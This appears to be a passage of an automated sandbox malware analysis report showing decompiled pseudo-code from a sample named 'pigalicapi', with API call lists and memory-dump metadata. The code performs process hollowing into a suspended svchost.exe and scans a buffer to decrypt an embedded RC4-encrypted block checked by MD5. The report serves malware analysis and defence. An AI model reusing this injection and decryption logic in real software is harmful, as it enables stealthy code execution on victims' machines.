                                                                                                                                                                                                                                                                                                        				_t265 = _t263 + 0x18;
                                                                                                                                                                                                                                                                                                        				_v1092.cb = 0x44;
                                                                                                                                                                                                                                                                                                        				_v1096 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
                                                                                                                                                                                                                                                                                                        				_v1016 = _v1096 + ( *(_v1096 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                                                                                                                                                        				_v8 =  *((intOrPtr*)(_v1096 + 0x50));
                                                                                                                                                                                                                                                                                                        				_t128 = VirtualAlloc(0, _v8, 0x3000, 0x40); // executed
                                                                                                                                                                                                                                                                                                        				_v12 = _t128;
                                                                                                                                                                                                                                                                                                        				if(_v12 != 0) {
                                                                                                                                                                                                                                                                                                        					_t130 = CreateProcessA(0,  &_v276, 0, 0, 0, 4, 0, 0,  &_v1092,  &_v1012); // executed
                                                                                                                                                                                                                                                                                                        					if(_t130 != 0) {
                                                                                                                                                                                                                                                                                                        						_t132 = VirtualAllocEx(_v1012.hProcess,  *(_v1096 + 0x34), _v8, 0x3000, 0x40); // executed
                                                                                                                                                                                                                                                                                                        						_v1100 = _t132;
                                                                                                                                                                                                                                                                                                        						if(_v1100 != 0) {
                                                                                                                                                                                                                                                                                                        							L10:
                                                                                                                                                                                                                                                                                                        							E024E7B70(_v12, _a4,  *((intOrPtr*)(_v1096 + 0x54)));
                                                                                                                                                                                                                                                                                                        							_t266 = _t265 + 0xc;
                                                                                                                                                                                                                                                                                                        							_v1104 = 0;
                                                                                                                                                                                                                                                                                                        							while(_v1104 < ( *(_v1096 + 6) & 0x0000ffff)) {
                                                                                                                                                                                                                                                                                                        								if((_a8 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        									E024E7B70(_v12 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)), _a4 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)),  *((intOrPtr*)(_v1016 + 0x10 + _v1104 * 0x28)));
                                                                                                                                                                                                                                                                                                        									_t266 = _t266 + 0xc;
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									E024E7B70(_v12 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)), _a4 +  *((intOrPtr*)(_v1016 + 0x14 + _v1104 * 0x28)),  *((intOrPtr*)(_v1016 + 0x10 + _v1104 * 0x28)));
                                                                                                                                                                                                                                                                                                        									_t266 = _t266 + 0xc;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								_v1104 = _v1104 + 1;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							E024E26D0(_v12, _v1100);
                                                                                                                                                                                                                                                                                                        							_t140 = WriteProcessMemory(_v1012.hProcess, _v1100, _v12, _v8, 0); // executed
                                                                                                                                                                                                                                                                                                        							if(_t140 != 0) {
                                                                                                                                                                                                                                                                                                        								VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                                        								_v996.ContextFlags = 0x10007;
                                                                                                                                                                                                                                                                                                        								_t143 = GetThreadContext(_v1012.hThread,  &_v996); // executed
                                                                                                                                                                                                                                                                                                        								if(_t143 != 0) {
                                                                                                                                                                                                                                                                                                        									_t145 = WriteProcessMemory(_v1012.hProcess, _v996.Ebx + 8,  &_v1100, 4, 0); // executed
                                                                                                                                                                                                                                                                                                        									if(_t145 != 0) {
                                                                                                                                                                                                                                                                                                        										_v996.Eax = _v1100 +  *((intOrPtr*)(_v1096 + 0x28));
                                                                                                                                                                                                                                                                                                        										_t148 = SetThreadContext(_v1012.hThread,  &_v996); // executed
                                                                                                                                                                                                                                                                                                        										if(_t148 == 0) {
                                                                                                                                                                                                                                                                                                        											TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                                                        											CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                                                        											CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                                                        											goto L26;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        										ResumeThread(_v1012.hThread); // executed
                                                                                                                                                                                                                                                                                                        										return _v1012.hProcess;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                                                        									CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                                                        									CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                                                        									return 0;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                                                        								CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                                                        								CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                                                        								return 0;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                                                        							CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                                                        							CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                                                        							VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                                                                        							return 0;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_v1100 = VirtualAllocEx(_v1012.hProcess, 0, _v8, 0x103000, 0x40);
                                                                                                                                                                                                                                                                                                        						if(_v1100 != 0) {
                                                                                                                                                                                                                                                                                                        							goto L10;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                                                        						CloseHandle(_v1012);
                                                                                                                                                                                                                                                                                                        						CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                                                        						VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                                                                        						return 0;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}
























                                                                                                                                                                                                                                                                                                        0x024e20bd
                                                                                                                                                                                                                                                                                                        0x024e2502
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e2502
                                                                                                                                                                                                                                                                                                        0x024e20d4
                                                                                                                                                                                                                                                                                                        0x024e20e6
                                                                                                                                                                                                                                                                                                        0x024e20f0
                                                                                                                                                                                                                                                                                                        0x024e20fe
                                                                                                                                                                                                                                                                                                        0x024e210f
                                                                                                                                                                                                                                                                                                        0x024e210f
                                                                                                                                                                                                                                                                                                        0x024e2120
                                                                                                                                                                                                                                                                                                        0x024e2133
                                                                                                                                                                                                                                                                                                        0x024e2138
                                                                                                                                                                                                                                                                                                        0x024e213b
                                                                                                                                                                                                                                                                                                        0x024e214e
                                                                                                                                                                                                                                                                                                        0x024e2168
                                                                                                                                                                                                                                                                                                        0x024e2177
                                                                                                                                                                                                                                                                                                        0x024e2187
                                                                                                                                                                                                                                                                                                        0x024e218d
                                                                                                                                                                                                                                                                                                        0x024e2194
                                                                                                                                                                                                                                                                                                        0x024e21c0
                                                                                                                                                                                                                                                                                                        0x024e21c8
                                                                                                                                                                                                                                                                                                        0x024e21fe
                                                                                                                                                                                                                                                                                                        0x024e2204
                                                                                                                                                                                                                                                                                                        0x024e2211
                                                                                                                                                                                                                                                                                                        0x024e227d
                                                                                                                                                                                                                                                                                                        0x024e228f
                                                                                                                                                                                                                                                                                                        0x024e2294
                                                                                                                                                                                                                                                                                                        0x024e2297
                                                                                                                                                                                                                                                                                                        0x024e22b2
                                                                                                                                                                                                                                                                                                        0x024e22ce
                                                                                                                                                                                                                                                                                                        0x024e235e
                                                                                                                                                                                                                                                                                                        0x024e2363
                                                                                                                                                                                                                                                                                                        0x024e22d0
                                                                                                                                                                                                                                                                                                        0x024e2312
                                                                                                                                                                                                                                                                                                        0x024e2317
                                                                                                                                                                                                                                                                                                        0x024e2317
                                                                                                                                                                                                                                                                                                        0x024e22ac
                                                                                                                                                                                                                                                                                                        0x024e22ac
                                                                                                                                                                                                                                                                                                        0x024e2376
                                                                                                                                                                                                                                                                                                        0x024e2396
                                                                                                                                                                                                                                                                                                        0x024e239e
                                                                                                                                                                                                                                                                                                        0x024e23ec
                                                                                                                                                                                                                                                                                                        0x024e23f2
                                                                                                                                                                                                                                                                                                        0x024e240a
                                                                                                                                                                                                                                                                                                        0x024e2412
                                                                                                                                                                                                                                                                                                        0x024e2460
                                                                                                                                                                                                                                                                                                        0x024e2468
                                                                                                                                                                                                                                                                                                        0x024e24a6
                                                                                                                                                                                                                                                                                                        0x024e24ba
                                                                                                                                                                                                                                                                                                        0x024e24c2
                                                                                                                                                                                                                                                                                                        0x024e24e2
                                                                                                                                                                                                                                                                                                        0x024e24ef
                                                                                                                                                                                                                                                                                                        0x024e24fc
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e24fc
                                                                                                                                                                                                                                                                                                        0x024e24cb
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e24d1
                                                                                                                                                                                                                                                                                                        0x024e2473
                                                                                                                                                                                                                                                                                                        0x024e2480
                                                                                                                                                                                                                                                                                                        0x024e248d
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e2493
                                                                                                                                                                                                                                                                                                        0x024e241d
                                                                                                                                                                                                                                                                                                        0x024e242a
                                                                                                                                                                                                                                                                                                        0x024e2437
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e243d
                                                                                                                                                                                                                                                                                                        0x024e23a9
                                                                                                                                                                                                                                                                                                        0x024e23b6
                                                                                                                                                                                                                                                                                                        0x024e23c3
                                                                                                                                                                                                                                                                                                        0x024e23d4
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e23da
                                                                                                                                                                                                                                                                                                        0x024e222d
                                                                                                                                                                                                                                                                                                        0x024e223a
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e2245
                                                                                                                                                                                                                                                                                                        0x024e2252
                                                                                                                                                                                                                                                                                                        0x024e225f
                                                                                                                                                                                                                                                                                                        0x024e2270
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e2276
                                                                                                                                                                                                                                                                                                        0x024e21d5
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e2196
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e2196

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetEnvironmentVariableA.KERNEL32(SystemRoot,?,00000104), ref: 024E20D4
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(?,\system32\svchost.exe), ref: 024E20E6
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(?,024EC38C), ref: 024E20FE
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(?,00000000), ref: 024E210F
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 024E2187
                                                                                                                                                                                                                                                                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 024E21C0
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 024E21D5
                                                                                                                                                                                                                                                                                                        • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 024E21FE
                                                                                                                                                                                                                                                                                                        • VirtualAllocEx.KERNEL32(?,00000000,?,00103000,00000040), ref: 024E2227
                                                                                                                                                                                                                                                                                                        • TerminateProcess.KERNEL32(?,00000000), ref: 024E2245
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 024E2252
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 024E225F
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 024E2270
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Virtual$Alloclstrcat$CloseFreeHandleProcess$CreateEnvironmentTerminateVariable
                                                                                                                                                                                                                                                                                                        • String ID: D$SystemRoot$\system32\svchost.exe
                                                                                                                                                                                                                                                                                                        • API String ID: 1819736980-1559310322
                                                                                                                                                                                                                                                                                                        • Opcode ID: 5b332cdf3e10b1c750763902a36ab61b9462757af9c839119db1d8ff2e707c1d
                                                                                                                                                                                                                                                                                                        • Instruction ID: 09b4e067ca92482fb560cd3d12d9334f9f1ed9bfea5e74e004763440074e3414
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5b332cdf3e10b1c750763902a36ab61b9462757af9c839119db1d8ff2e707c1d
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 28D120B1E40215EBEF28CF94DCD4FAA7779BB48705F048599F60AAB281D6709B80CF54
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 718 24e47f0-24e4801 719 24e4aab-24e4ab1 718->719 720 24e4807-24e480e 718->720 720->719 721 24e4814-24e4832 CryptAcquireContextA 720->721 722 24e4856-24e485a 721->722 723 24e4834-24e483f GetLastError 721->723 722->719 725 24e4860-24e489d 722->725 723->722 724 24e4841-24e4850 CryptAcquireContextA 723->724 724->722 727 24e4a9f-24e4aa5 CryptReleaseContext 725->727 728 24e48a3-24e48f3 call 24e7b70 CryptCreateHash 725->728 727->719 731 24e48f9-24e4913 CryptHashData 728->731 732 24e4a90-24e4a96 728->732 735 24e4919-24e4944 CryptDeriveKey 731->735 736 24e4a83-24e4a8a CryptDestroyHash 731->736 733 24e4a9a 732->733 734 24e4a98 732->734 733->727 734->727 735->736 737 24e494a-24e498f CryptDecrypt CryptDestroyKey 735->737 736->732 737->736 738 24e4995-24e49b1 CryptCreateHash 737->738 738->736 739 24e49b7-24e49d4 CryptHashData 738->739 740 24e49da-24e4a0f CryptGetHashParam 739->740 741 24e4a76-24e4a7d CryptDestroyHash 739->741 740->741 742 24e4a11-24e4a3c CryptGetHashParam 740->742 741->736 742->741 743 24e4a3e-24e4a58 call 24e7c70 742->743 743->741 746 24e4a5a-24e4a72 call 24e7b70 743->746 746->741
                                                                                                                                                                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                                                                                                                                                                        			E024E47F0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                                        				signed int _v5;
                                                                                                                                                                                                                                                                                                        				long* _v12;
                                                                                                                                                                                                                                                                                                        				char _v28;
                                                                                                                                                                                                                                                                                                        				char _v764;
                                                                                                                                                                                                                                                                                                        				char _v780;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v784;
                                                                                                                                                                                                                                                                                                        				char _v788;
                                                                                                                                                                                                                                                                                                        				int _v792;
                                                                                                                                                                                                                                                                                                        				int _v796;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v800;
                                                                                                                                                                                                                                                                                                        				long* _v804;
                                                                                                                                                                                                                                                                                                        				int _v808;
                                                                                                                                                                                                                                                                                                        				int _v812;
                                                                                                                                                                                                                                                                                                        				char _v816;
                                                                                                                                                                                                                                                                                                        				int _v820;
                                                                                                                                                                                                                                                                                                        				char _v824;
                                                                                                                                                                                                                                                                                                        				char _v828;
                                                                                                                                                                                                                                                                                                        				char _v844;
                                                                                                                                                                                                                                                                                                        				int _t61;
                                                                                                                                                                                                                                                                                                        				char* _t67;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t68;
                                                                                                                                                                                                                                                                                                        				int _t69;
                                                                                                                                                                                                                                                                                                        				char* _t73;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t74;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t76;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t77;
                                                                                                                                                                                                                                                                                                        				signed char _t78;
                                                                                                                                                                                                                                                                                                        				void* _t109;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 == 0 || _a8 <= 0x300) {
                                                                                                                                                                                                                                                                                                        					L25:
                                                                                                                                                                                                                                                                                                        					return _v5;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_v12 = 0;
                                                                                                                                                                                                                                                                                                        					_t61 = CryptAcquireContextA( &_v12, 0, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                                                        					if(_t61 == 0 && GetLastError() == 0x80090016) {
                                                                                                                                                                                                                                                                                                        						CryptAcquireContextA( &_v12, 0, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                                        						_v788 = 0x10;
                                                                                                                                                                                                                                                                                                        						_v784 = 0x10;
                                                                                                                                                                                                                                                                                                        						_v792 = 0;
                                                                                                                                                                                                                                                                                                        						while(_v792 < _a8 - 0x2ff) {
                                                                                                                                                                                                                                                                                                        							E024E7B70( &_v780, _a4 + _v792, 0x300);
                                                                                                                                                                                                                                                                                                        							_t109 = _t109 + 0xc;
                                                                                                                                                                                                                                                                                                        							_t67 =  &_v780;
                                                                                                                                                                                                                                                                                                        							_v800 = _t67;
                                                                                                                                                                                                                                                                                                        							_v796 = 0;
                                                                                                                                                                                                                                                                                                        							__imp__CryptCreateHash(_v12, 0x8003, 0, 0,  &_v796);
                                                                                                                                                                                                                                                                                                        							if(_t67 == 0) {
                                                                                                                                                                                                                                                                                                        								L21:
                                                                                                                                                                                                                                                                                                        								if((_v5 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                                        									_v792 = _v792 + 1;
                                                                                                                                                                                                                                                                                                        									continue;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								break;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							_t68 = _v800;
                                                                                                                                                                                                                                                                                                        							__imp__CryptHashData(_v796, _t68, 0x10, 0);
                                                                                                                                                                                                                                                                                                        							if(_t68 != 0) {
                                                                                                                                                                                                                                                                                                        								_v804 = 0;
                                                                                                                                                                                                                                                                                                        								_t69 = _v796;
                                                                                                                                                                                                                                                                                                        								__imp__CryptDeriveKey(_v12, 0x6801, _t69, 1,  &_v804); // executed
                                                                                                                                                                                                                                                                                                        								if(_t69 != 0) {
                                                                                                                                                                                                                                                                                                        									_v812 = 0x2f0;
                                                                                                                                                                                                                                                                                                        									_v808 = CryptDecrypt(_v804, 0, 1, 0,  &_v764,  &_v812);
                                                                                                                                                                                                                                                                                                        									CryptDestroyKey(_v804);
                                                                                                                                                                                                                                                                                                        									if(_v808 != 0) {
                                                                                                                                                                                                                                                                                                        										_t73 =  &_v816;
                                                                                                                                                                                                                                                                                                        										__imp__CryptCreateHash(_v12, 0x8003, 0, 0, _t73);
                                                                                                                                                                                                                                                                                                        										if(_t73 != 0) {
                                                                                                                                                                                                                                                                                                        											_t74 = _v816;
                                                                                                                                                                                                                                                                                                        											__imp__CryptHashData(_t74,  &_v780, 0x2f0, 0);
                                                                                                                                                                                                                                                                                                        											if(_t74 != 0) {
                                                                                                                                                                                                                                                                                                        												_v820 = 0;
                                                                                                                                                                                                                                                                                                        												_v824 = 4;
                                                                                                                                                                                                                                                                                                        												_t76 = _v816;
                                                                                                                                                                                                                                                                                                        												__imp__CryptGetHashParam(_t76, 4,  &_v820,  &_v824, 0);
                                                                                                                                                                                                                                                                                                        												if(_t76 != 0) {
                                                                                                                                                                                                                                                                                                        													_v828 = 0x10;
                                                                                                                                                                                                                                                                                                        													_t77 = _v816;
                                                                                                                                                                                                                                                                                                        													__imp__CryptGetHashParam(_t77, 2,  &_v844,  &_v828, 0);
                                                                                                                                                                                                                                                                                                        													if(_t77 != 0) {
                                                                                                                                                                                                                                                                                                        														_t78 = E024E7C70( &_v28,  &_v844,  &_v28, 0x10);
                                                                                                                                                                                                                                                                                                        														_t109 = _t109 + 0xc;
                                                                                                                                                                                                                                                                                                        														if((_t78 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        															E024E7B70(_a12,  &_v780, 0x300);
                                                                                                                                                                                                                                                                                                        															_t109 = _t109 + 0xc;
                                                                                                                                                                                                                                                                                                        															_v5 = 1;
                                                                                                                                                                                                                                                                                                        														}
                                                                                                                                                                                                                                                                                                        													}
                                                                                                                                                                                                                                                                                                        												}
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        											__imp__CryptDestroyHash(_v816);
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							__imp__CryptDestroyHash(_v796);
                                                                                                                                                                                                                                                                                                        							goto L21;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L25;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}































                                                                                                                                                                                                                                                                                                        0x024e47f9
                                                                                                                                                                                                                                                                                                        0x024e4801
                                                                                                                                                                                                                                                                                                        0x024e4aab
                                                                                                                                                                                                                                                                                                        0x024e4ab1
                                                                                                                                                                                                                                                                                                        0x024e4814
                                                                                                                                                                                                                                                                                                        0x024e4814
                                                                                                                                                                                                                                                                                                        0x024e482a
                                                                                                                                                                                                                                                                                                        0x024e4832
                                                                                                                                                                                                                                                                                                        0x024e4850
                                                                                                                                                                                                                                                                                                        0x024e4850
                                                                                                                                                                                                                                                                                                        0x024e485a
                                                                                                                                                                                                                                                                                                        0x024e4860
                                                                                                                                                                                                                                                                                                        0x024e486a
                                                                                                                                                                                                                                                                                                        0x024e4874
                                                                                                                                                                                                                                                                                                        0x024e488f
                                                                                                                                                                                                                                                                                                        0x024e48b9
                                                                                                                                                                                                                                                                                                        0x024e48be
                                                                                                                                                                                                                                                                                                        0x024e48c1
                                                                                                                                                                                                                                                                                                        0x024e48c7
                                                                                                                                                                                                                                                                                                        0x024e48cd
                                                                                                                                                                                                                                                                                                        0x024e48eb
                                                                                                                                                                                                                                                                                                        0x024e48f3
                                                                                                                                                                                                                                                                                                        0x024e4a90
                                                                                                                                                                                                                                                                                                        0x024e4a96
                                                                                                                                                                                                                                                                                                        0x024e4889
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e4889
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e4a98
                                                                                                                                                                                                                                                                                                        0x024e48fd
                                                                                                                                                                                                                                                                                                        0x024e490b
                                                                                                                                                                                                                                                                                                        0x024e4913
                                                                                                                                                                                                                                                                                                        0x024e4919
                                                                                                                                                                                                                                                                                                        0x024e492c
                                                                                                                                                                                                                                                                                                        0x024e493c
                                                                                                                                                                                                                                                                                                        0x024e4944
                                                                                                                                                                                                                                                                                                        0x024e494a
                                                                                                                                                                                                                                                                                                        0x024e4975
                                                                                                                                                                                                                                                                                                        0x024e4982
                                                                                                                                                                                                                                                                                                        0x024e498f
                                                                                                                                                                                                                                                                                                        0x024e4995
                                                                                                                                                                                                                                                                                                        0x024e49a9
                                                                                                                                                                                                                                                                                                        0x024e49b1
                                                                                                                                                                                                                                                                                                        0x024e49c5
                                                                                                                                                                                                                                                                                                        0x024e49cc
                                                                                                                                                                                                                                                                                                        0x024e49d4
                                                                                                                                                                                                                                                                                                        0x024e49da
                                                                                                                                                                                                                                                                                                        0x024e49e4
                                                                                                                                                                                                                                                                                                        0x024e4a00
                                                                                                                                                                                                                                                                                                        0x024e4a07
                                                                                                                                                                                                                                                                                                        0x024e4a0f
                                                                                                                                                                                                                                                                                                        0x024e4a11
                                                                                                                                                                                                                                                                                                        0x024e4a2d
                                                                                                                                                                                                                                                                                                        0x024e4a34
                                                                                                                                                                                                                                                                                                        0x024e4a3c
                                                                                                                                                                                                                                                                                                        0x024e4a4b
                                                                                                                                                                                                                                                                                                        0x024e4a50
                                                                                                                                                                                                                                                                                                        0x024e4a58
                                                                                                                                                                                                                                                                                                        0x024e4a6a
                                                                                                                                                                                                                                                                                                        0x024e4a6f
                                                                                                                                                                                                                                                                                                        0x024e4a72
                                                                                                                                                                                                                                                                                                        0x024e4a72
                                                                                                                                                                                                                                                                                                        0x024e4a58
                                                                                                                                                                                                                                                                                                        0x024e4a3c
                                                                                                                                                                                                                                                                                                        0x024e4a0f
                                                                                                                                                                                                                                                                                                        0x024e4a7d
                                                                                                                                                                                                                                                                                                        0x024e4a7d
                                                                                                                                                                                                                                                                                                        0x024e49b1
                                                                                                                                                                                                                                                                                                        0x024e498f
                                                                                                                                                                                                                                                                                                        0x024e4944
                                                                                                                                                                                                                                                                                                        0x024e4a8a
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e4a8a
                                                                                                                                                                                                                                                                                                        0x024e4aa5
                                                                                                                                                                                                                                                                                                        0x024e4aa5
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e485a

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 024E482A
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 024E4834
                                                                                                                                                                                                                                                                                                        • CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 024E4850
                                                                                                                                                                                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 024E48EB
                                                                                                                                                                                                                                                                                                        • CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 024E490B
                                                                                                                                                                                                                                                                                                        • CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 024E493C
                                                                                                                                                                                                                                                                                                        • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 024E496F
                                                                                                                                                                                                                                                                                                        • CryptDestroyKey.ADVAPI32(00000000), ref: 024E4982
                                                                                                                                                                                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?), ref: 024E49A9
                                                                                                                                                                                                                                                                                                        • CryptHashData.ADVAPI32(?,?,000002F0,00000000), ref: 024E49CC
                                                                                                                                                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(?,00000004,00000000,00000004,00000000), ref: 024E4A07
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 024E481F
                                                                                                                                                                                                                                                                                                        • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 024E4845
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Crypt$Hash$AcquireContextCreateData$DecryptDeriveDestroyErrorLastParam
